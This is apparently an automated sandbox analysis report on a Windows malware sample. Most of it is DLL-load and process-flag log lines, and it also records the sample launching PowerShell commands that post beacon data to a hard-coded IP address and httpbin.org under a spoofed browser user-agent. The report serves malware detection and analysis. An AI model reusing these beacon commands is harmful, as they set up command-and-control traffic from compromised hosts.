Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe

Static file information: File size 1817088 > 1048576

Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: softy.pdb9 source: powershell.exe, 00000002.00000002.1986403880.000001F1E9F35000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: softy.pdb source: powershell.exe, 0000000A.00000002.2817614035.000001DCC0810000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb: source: powershell.exe, 00000002.00000002.1986403880.000001F1E9FFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: utomation.pdb2 source: powershell.exe, 00000007.00000002.2378199469.000001DC9D14C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2378199469.000001DC9D090000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2380075739.000001DC9D2E3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1986403880.000001F1E9F5F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2819961114.000001DCC0A25000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: powershell.exe, 00000007.00000002.2380075739.000001DC9D2E3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2817614035.000001DCC0893000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.2819961114.000001DCC0A85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb' source: powershell.exe, 00000002.00000002.1986403880.000001F1E9FFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbP source: powershell.exe, 00000007.00000002.2380075739.000001DC9D290000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ment.Automation.pdbh source: powershell.exe, 00000002.00000002.1987556693.000001F1EA1A9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1987556693.000001F1EA130000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2819961114.000001DCC0A85000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1987556693.000001F1EA130000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000007.00000002.2378199469.000001DC9D090000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1986403880.000001F1E9FFA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1987556693.000001F1EA130000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2351549526.000001DC831B8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2819961114.000001DCC0A25000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2380075739.000001DC9D290000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2819961114.000001DCC0A25000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1986403880.000001F1E9F89000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2817614035.000001DCC085D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb*X' source: powershell.exe, 0000000A.00000002.2817614035.000001DCC08CD000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://44.207.250.251/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "$function:irm = { Invoke-RestMethod @args }; $headers = @{\"User-Agent\"=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36\"}; $b=@{d=\"This is beacon traffic, which could contain compromised host information, some identifier, or some value to indicate a healthy implant to the C2 server, among other things.\"}; irm \"http://httpbin.org/post\" -method post -body ($b\|ConvertTo-Json) -headers $headers -ContentType \"application/json\""	Jump to behavior

Source: SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe

Static PE information: section name: .symtab

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B8762E0 push FFFFFFE8h; retf	2_2_00007FFD9B8765F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B873A04 pushad ; retf	2_2_00007FFD9B873A11
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B872078 push E95EBCD2h; ret	2_2_00007FFD9B8720E9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B877560 push ebx; iretd	2_2_00007FFD9B87756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B87D532 push eax; retf	2_2_00007FFD9B87D533
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD9B877548 push ebx; iretd	2_2_00007FFD9B87756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD9BAA7967 push ebx; retf	6_2_00007FFD9BAA796A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD9BAA7560 push ebx; iretd	6_2_00007FFD9BAA756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 6_2_00007FFD9BAA9958 push E8FFFFFFh; iretd	6_2_00007FFD9BAA995D

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.27241.18801.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
